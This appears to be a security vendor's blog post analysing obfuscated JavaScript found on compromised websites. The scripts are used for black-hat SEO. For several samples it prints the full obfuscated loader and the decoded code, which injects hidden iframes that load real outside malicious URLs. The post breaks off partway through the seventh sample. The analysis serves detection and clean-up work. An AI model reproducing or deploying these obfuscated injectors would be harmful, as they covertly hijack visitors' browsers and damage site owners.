Top 9 obfuscated malicious JavaScript threats detected by Quttera's online malware scanner during the last week
Background
In the cyber era, more and more businesses and individuals are using the internet for product promotion, marketing, sales and business development. Advertising budgets have turned from newspapers and television towards web technologies. More companies are hunting for new customers on the World Wide Web.
In internet marketing, business starts from a very simple thing: drive as many unique visitors as possible to the product's website, hoping that a few percent of them will finally convert into real customers. On the other hand, to have a large number of unique visitors, a website must be pretty popular: highly visible in search engine result pages (generic search) and highly ranked. The straightforward and expensive solution is internet advertising.
Unfortunately, a new business can rarely afford any of these but still must, somehow, gain unique visitors in order to survive. However, there is a relatively simple and inexpensive alternative that brings any website to the top of search engine result pages and boosts its rating using illegal techniques.
Such services are often referred to as "Black hat SEO".
BlackHat SEO and hidden iframes
SEO stands for "search engine optimization", and "black hat" refers to old black-and-white western movies where the good guys wore white hats and the bad guys wore black. So what is black hat SEO?
Black hat SEO is a process or set of actions that improves the volume and quality of traffic to a website using unethical techniques which in the majority of cases violate search engine guidelines, for example SEO Spam Injection or BlackHat Cloaking. In this post we want to talk about a well-known and widely used traffic improvement technique that is based on hidden iframes.
Injected into multiple websites around the world, such hidden iframes lead to pages on the "promoting" website. They have very small or zero dimensions and are often invisible to the visitor.
The major issue with this is that within a very short period of time search engines recognize this kind of falsification and punish the involved website. This may be done by moving it down in search engine result pages or by simply blacklisting it.
Online Website Scanner statistics
Following is a top 9 of obfuscated JavaScript threats detected by the Quttera public web malware scanner, which are used to generate and inject hidden iframes into external websites in order to increase traffic leading to the "promoting" website. All of these threats were detected on compromised web servers which, if no prompt clean-up was done, were blacklisted by search engines.
Malicious action: injecting hidden iframe to http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html
Malicious action: injecting hidden iframe to http://busodeark.be/Fotos/2gkvYPRW.php
Malicious action: injecting hidden iframe to http://de-verzend-service.nl/3xzqrG8t.php
Malicious action: injecting hidden iframe to http://private3[.]zapto[.]org
Malicious action: injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php
Malicious action: injecting hidden iframe to http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php
Malicious action: injecting hidden iframe to http://vasnetworker.com/cnt.php
Malicious action: injecting hidden iframe to either www.simv.info/in.cgi or http://about.hautetfort.com
Such malware is often hidden inside a JavaScript file. If you suspect that your website was infected by similar malware, please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.
Sample 1
- try {
- if (window.document)--document.getElementById('12')
- } catch (qq) {
- if (qq != null) ss = eval("St" + "ring");
- }
- a ="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";
- z = [];
- for (i = 0; i < a.length; i += 2) {
- z.push(parseInt(a.substr(i, 2), 16) - 14);
- }
- eval(ss["fr" + "omCharCode"].apply(ss, z));
Malicious action: injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php
- function zzzfff() {
- var yoee = document.createElement('iframe');
- yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
- yoee.style.position = 'absolute';
- yoee.style.border = '0';
- yoee.style.height = '1px';
- yoee.style.width = '1px';
- yoee.style.left = '1px';
- yoee.style.top = '1px';
- if (!document.getElementById('yoee')) {
- document.write('<div id=\'yoee\'></div>');
- document.getElementById('yoee').appendChild(yoee);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 2
- ff = String;
- fff = "fromCha" + "rCode";
- ff = ff[fff];
- zz = 3;
- try {
- document.body % 26 = 5151
- } catch (bt4y34by) {
- v = 123;
- vzs = 0;
- try {
- document;
- } catch (q) {
- vzs = 1;
- }
- if (!vzs) e = eval;
- if (1) {
- f = new Array(04, 04, 0144, 0141, 033, 043, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142,0140, 0157, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140,043, 042, 0135, 0152, 0137, 0164, 042, 044, 0126, 053, 0130, 044, 0166, 010, 04, 04, 04, 0144, 0141, 0155, 0134,0150, 0140, 0155, 043, 044, 066, 010, 04, 04, 0170, 033, 0140, 0147, 0156, 0140, 033, 0166, 010, 04, 04, 04, 0137,0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0162, 0155, 0144, 0157, 0140, 043, 035, 067, 0144, 0141, 0155,0134, 0150, 0140, 033, 0156, 0155, 0136, 070, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147,0157, 0143, 0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051,0136, 0152, 0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141,064, 0141, 055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054,051, 0143, 0157, 0150, 0147, 042, 033, 0162, 0144, 0137, 0157, 0143, 070, 042, 054, 053, 053, 042, 033, 0143,0140, 0144, 0142, 0143, 0157, 070, 042, 054, 053, 053, 042, 033, 0156, 0157, 0164, 0147, 0140, 070, 042, 0162,0144, 0137, 0157, 0143, 065, 054, 053, 053, 0153, 0163, 066, 0143, 0140, 0144, 0142, 0143, 0157, 065, 054, 053,053, 0153, 0163, 066, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 065, 0134, 0135, 0156, 0152, 0147, 0160,0157, 0140, 066, 0161, 0144, 0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 065, 0143, 0144, 0137, 0137, 0140,0151, 066, 0147, 0140, 0141, 0157, 065, 050, 054, 053, 053, 053, 053, 0153, 0163, 066, 0157, 0152, 0153, 065, 053,066, 042, 071, 067, 052, 0144, 0141, 0155, 0134, 0150, 0140, 071, 035, 044, 066, 010, 04, 04, 0170, 010, 04, 04,0141, 0160, 0151, 0136, 0157, 0144, 0152, 0151, 033, 0144, 0141, 0155, 0134, 0150, 0140, 0155, 043, 044, 0166,010, 04, 04, 04, 0161, 0134, 0155, 033, 0141, 033, 070, 033, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 
051,0136, 0155, 0140, 0134, 0157, 0140, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 043, 042, 0144, 0141, 0155, 0134,0150, 0140, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043,042, 0156, 0155, 0136, 042, 047, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147, 0157, 0143,0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051, 0136, 0152,0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141, 064, 0141,055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054, 051, 0143,0157, 0150, 0147, 042, 044, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0147, 0140, 0141, 0157, 070, 042,050, 054, 053, 053, 053, 053, 0153, 0163, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0161, 0144,0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 070, 042, 0143, 0144, 0137, 0137, 0140, 0151, 042, 066, 0141, 051,0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141, 051, 0156, 0157, 0164, 0147,0140, 051, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 070, 042, 0134, 0135, 0156, 0152, 0147, 0160, 0157,0140, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141,051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043, 042, 0162, 0144, 0137, 0157,0143, 042, 047, 042, 054, 053, 053, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135,0160, 0157, 0140, 043, 042, 0143, 0140, 0144, 0142, 0143, 0157, 042, 047, 042, 054, 053, 053, 042, 044, 066, 010,04, 04, 04, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142, 0140, 0157, 0100, 0147, 0140, 0150, 0140,0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140, 043, 042, 0135, 0152, 0137, 0164, 042, 044,0126, 053, 0130, 051, 0134, 0153, 0153, 0140, 0151, 0137, 076, 0143, 0144, 0147, 0137, 043, 
0141, 044, 066, 010,04, 04, 0170);
- }
- w = f;
- s = [];
- if (window.document)
- for (i = 2 - 2; - i + 724 != 0; i += 1) {
- j = i;
- if ((031 == 0x19))
- if (e) s = s + ff(w[j] + 5);
- }
- xz = e;
- if (window.document) xz(s)
- }
Malicious action: injecting hidden iframe to http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html
- if (document.getElementsByTagName('body')[0]) {
- iframer();
- } else {
- document.write("<iframe src='http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
- }
- function iframer() {
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html');
- f.style.left = '-10000px';
- f.style.visibility = 'hidden';
- f.style.top = '0';
- f.style.position = 'absolute';
- f.style.top = '0';
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
Sample 3
- ps = "s" + "p" + "l" + "i" + "t";
- asd = function () {
- -- (d.body)
- };
- a =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,177,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,177,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,151,174,172,166,153,154,150,171,162,65,151,154,66,115,166,173,166,172,66,71,156,162,175,140,127,131,136,65,167,157,167,56,102,24,21,47,177,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,177,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,177,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,177,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,177,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,2
03,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,16
6,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
- d = document;
- for (i = 0; i < a.length; i += 1) {
- a[i] = -(10 - 3) + parseInt(a[i], 5 + 3);
- }
- try {
- asd()
- } catch (q) {
- yy = 50 - 50;
- }
- try {
- yy /= 18
- } catch (pq) {
- yy = 1;
- }
- if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));
Malicious action: injecting hidden iframe to http://busodeark.be/Fotos/2gkvYPRW.php
- function zzzfff() {
- var x = document.createElement('iframe');
- x.src = 'http://busodeark.be/Fotos/2gkvYPRW.php';
- x.style.position = 'absolute';
- x.style.border = '0';
- x.style.height = '1px';
- x.style.width = '1px';
- x.style.left = '1px';
- x.style.top = '1px';
- if (!document.getElementById('x')) {
- document.write('<div id=\'x\'></div>');
- document.getElementById('x').appendChild(x);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 4
- try {
- if (window.document)--document.getElementById('12')
- } catch (qq) {
- if (qq != null) ss = eval("St" + "ring");
- }
- a ="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";
- z = [];
- for (i = 0; i < a.length; i += 2) {
- z.push(parseInt(a.substr(i, 2), 16) - 14);
- }
- eval(ss["fr" + "omCharCode"].apply(ss, z));
Malicious action: injecting hidden iframe to http://de-verzend-service.nl/3xzqrG8t.php
- function zzzfff() {
- var swpm = document.createElement('iframe');
- swpm.src = 'http://de-verzend-service.nl/3xzqrG8t.php';
- swpm.style.position = 'absolute';
- swpm.style.border = '0';
- swpm.style.height = '9px';
- swpm.style.width = '7px';
- swpm.style.left = '1px';
- swpm.style.top = '1px';
- if (!document.getElementById('swpm')) {
- document.write('<div id=\'swpm\'></div>');
- document.getElementById('swpm').appendChild(swpm);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length))) {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled) {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 5
- var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cN
RoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
- yvDFQwwmM = eval;
- var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
- yvDFQwwmM("document.write(unescape(WSxQJgvuB))");
Malicious action: injecting hidden iframe to http://private3[.]zapto[.]org
- <iframe src="http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854"
- name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0">
- </iframe>
Sample 6
- try {
- if (window.document)--document.getElementById('12')
- } catch (qq) {
- if (qq != null) ss = eval("St" + "ring");
- }
- a ="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877d73732e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877d73733c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e877d73733c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877d73733c8182877a733c707d807273802e4b2e353e35491b182e877d73733c8182877a733c7673777576822e4b2e353f7e8635491b182e877d73733c8182877a733c85777282762e4b2e353f7e8635491b182e877d73733c8182877a733c7a7374822e4b2e353f7e8635491b182e877d73733c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877d73733537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877d73736a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877d737335373c6f7e7e737c725176777a7236877d737337491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e
891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";
- z = [];
- for (i = 0; i < a.length; i += 2) {
- z.push(parseInt(a.substr(i, 2), 16) - 14);
- }
- eval(ss["fr" + "omCharCode"].apply(ss, z));
Malicious action: injecting hidden iframe to http://www.eaglesunsystem.com/video/k8dhKQHr.php
- function zzzfff() {
- var yoee = document.createElement('iframe');
- yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
- yoee.style.position = 'absolute';
- yoee.style.border = '0';
- yoee.style.height = '1px';
- yoee.style.width = '1px';
- yoee.style.left = '1px';
- yoee.style.top = '1px';
- if (!document.getElementById('yoee')) {
- document.write('<div id=\'yoee\'></div>');
- document.getElementById('yoee').appendChild(yoee);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
Sample 7
- ps = "s" + "p" + "l" + "i" + "t";
- asd = function () {
- ++d.body
- };
- a =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,163,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,163,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,167,154,173,154,171,65,165,154,160,172,157,65,165,154,173,66,176,167,64,152,166,165,173,154,165,173,66,167,163,174,156,160,165,172,66,152,174,172,173,166,164,160,201,154,64,150,153,164,160,165,66,70,167,131,176,140,126,100,136,65,167,157,167,56,102,24,21,47,163,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,163,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,163,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,163,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,163,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,163,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,